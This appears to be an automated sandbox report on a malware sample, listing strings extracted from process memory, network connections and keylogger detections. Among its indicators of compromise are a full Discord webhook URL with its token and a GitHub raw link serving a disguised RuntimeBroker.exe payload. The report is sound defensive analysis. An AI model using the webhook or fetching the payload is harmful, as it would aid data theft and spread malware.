Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit
Source: javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager
Source: javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xalan
Source: javaw.exe, 0000000C.00000002.3911788928.000000000A244000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3930308260.0000000018C74000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588459835.0000000018C6D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.2681083567.0000000018C6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-stripping
Source: javaw.exe, 0000000C.00000002.3911788928.000000000A2E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-stripping;
Source: javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xslt
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespace-prefixes-
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespaces
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespaces&
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/string-interning
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/string-interningfeature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/validation
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/lexical-handler
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/xml-string
Source: powershell.exe, 00000005.00000002.2580860064.0000020D95640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2580860064.0000020D95607000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1628873409.000002208E560000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1628873409.000002208E527000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820608682.00000254121D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.github.com/_private/browser/errors
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.github.com/_private/browser/stats
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://avatars.githubusercontent.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://collector.github.com/github/collect
Source: powershell.exe, 00000009.00000002.2284762070.0000025422383000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2284762070.0000025422383000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2284762070.0000025422383000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/webhooks/1352684770521387070/EnDdIPnq1Toz0toXGIhTo1T09Jq8MMJhXvjTWp5MjXqB
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.github.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.github.com/get-started/accessibility/keyboard-shortcuts
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github-cloud.s3.amazonaws.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.blog
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820608682.0000025412E02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AnonAm0369/am/raw/refs/heads
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820608682.0000025412E02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820608682.00000254121D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe"
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AnonAm0369/am/raw/refs/headsp
Source: powershell.exe, 00000009.00000002.1820608682.0000025412402000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/collections
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/customer-stories
Source: powershell.exe, 00000009.00000002.1820608682.00000254137E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ente
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/enterprise
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/enterprise/startups
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/actions
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/code-review
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/code-search
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/codespaces
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/copilot
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/discussions
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/issues
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/security
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/fluidicon.png
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/readme
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/resources/whitepapers
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/solutions/executive-insights
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/team
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/topics
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/trending
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_as
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_m
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-3e000c5d
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/behaviors-7ebb6421bf22.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark-8a995f0bacd4.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark_colorblind-cd826e8636dc.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-f
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-f37fb7684b1f.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-fp
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark_high_contrast-9ac301c3ebe5.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark_tritanopia-18119e682df0.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/element-registry-0bebfa1427c4.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/environment-f04cb2a9fc8c.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/error-3bfb6168c7d5.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/github-43ae85d4871b.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/github-elements-394f8eb34f19.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/github-mark-57519b92ca4e.png
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/github-octocat-13c86b8b336d.png
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/global-7d4d2344e7ab.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/global-banner-disable-f988792be49f.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/keyboard-shortcuts-dialog-33dfb803e078.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/light-74231a1f3bbb.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/light_colorblind-f91b0f603451.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/light_high_contrast-83beb16e0ecf.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/light_tritanopia-6e122dab64fc.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/mona-sans-d1bf285e9b9b.woff2
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/notifications-global-01e85cd1be94.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/octicons-react-cf2f2ab8dab4.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/primer-aaa714e5674d.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/primer-primitives-225433424a87.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/primer-react-e05a7c4c5398.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/primer-react.50398dad705ce9fff192.module.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/react-core-8d75451d837a.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/react-lib-f1bca44e0926.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/sessions-730dca81d0a2.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/site-3e72ff5534e0.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-75968cfb5298.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/ui_packages_ui-commands_ui-commands_ts-46ae788e9cbd.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-2a55124d5c
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-pr
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-po
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_inde
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_markdown-toolbar-element_dist_ind
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nod
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-a0
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f4
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f481b.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f4p
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-0dbb
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/wp-runtime-da74d68ae715.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/favicons/favicon
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/favicons/favicon.png
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/favicons/favicon.svg
Source: powershell.exe, 00000009.00000002.1820608682.0000025412E02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.2284762070.0000025422240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2284762070.0000025422383000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://partner.github.com
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/???
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://resources.github.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://resources.github.com/learn/pathways
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://skills.github.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://user-images.githubusercontent.com/
Source: final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.113.3:443 -> 192.168.2.6:49685 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: Payload.exe.11.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: 11.2.final.exe.3758448.0.raw.unpack, kl.cs	.Net Code: VKCodeToUnicode

E-Banking Fraud

Malicious encrypted Powershell command line found

